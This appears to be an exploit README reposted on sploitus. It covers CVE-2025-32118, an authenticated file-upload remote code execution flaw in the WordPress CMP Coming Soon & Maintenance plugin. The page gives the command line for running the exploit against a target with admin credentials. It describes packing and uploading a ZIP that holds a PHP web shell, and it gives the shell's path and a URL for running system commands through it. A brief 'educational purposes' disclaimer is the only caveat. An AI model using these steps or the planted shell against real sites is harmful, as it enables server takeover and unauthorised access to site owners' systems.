Share
## https://sploitus.com/exploit?id=CE4301A7-5D83-5992-AECD-A5A54F4B3B6F
# ๐ CVE-2025-32118 - WordPress CMP Plugin RCE Exploit
๐ **Title:** WordPress CMP โ Coming Soon & Maintenance plugin <= 4.1.13 - Remote Code Execution (RCE)
๐๏ธ **Published:** 2025-04-04
๐ **CWE:** CWE-434 - Unrestricted Upload of File with Dangerous Type
๐ **CVSS:** 9.1 (CRITICAL) โ CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
---
## ๐ Description
A critical **Remote Code Execution** (RCE) vulnerability exists in the **CMP โ Coming Soon & Maintenance** plugin for WordPress (<= 4.1.13).
This flaw allows an **authenticated admin user** to upload malicious ZIP files containing executable PHP shells, leading to **full site compromise**.
---
## ๐ฅ Impact
- Upload of arbitrary PHP code inside the plugin directory
- Unrestricted execution of system commands via web shell
- Potential full server takeover
---
## โ๏ธ Requirements
- WordPress site with vulnerable CMP plugin installed (`<= 4.1.13`)
- Valid WordPress admin credentials (Authentication Required)
---
## ๐ป Usage
```bash
python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
```
## โ๏ธ Usage (CLI Help Output)
```
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
```
---
### ๐ Arguments:
| Flag | Description |
|------------|--------------------------------|
| `-u` | Base URL of WordPress site |
| `-un` | username |
| `-p` | password |
---
## ๐งช What it does:
1. Authenticates to the WordPress admin panel.
2. Fetches a valid `nonce` for upload request.
3. Creates a malicious ZIP with:
- `style.css` (valid theme format)
- `nxploitedshell.php` (RCE payload)
4. Uploads the ZIP using the vulnerable theme upload functionality.
5. Verifies the shell by executing `?cmd=whoami`.
---
## ๐ Shell Location
Once uploaded successfully, the shell will be located at:
```
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
```
Test it via:
```bash
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
```
---
## โ Disclaimer
> This exploit is for **educational purposes** only.
> Unauthorized use of this code **against systems you don't own** is illegal and unethical.
---
## ๐ Reference
- [CVE-2025-32118 on MITRE](https://cve.mitre.org/)
- CWE-434: [https://cwe.mitre.org/data/definitions/434.html](https://cwe.mitre.org/data/definitions/434.html)
---
## โ๏ธ By:
*Nxploited | Khaled Alenazi*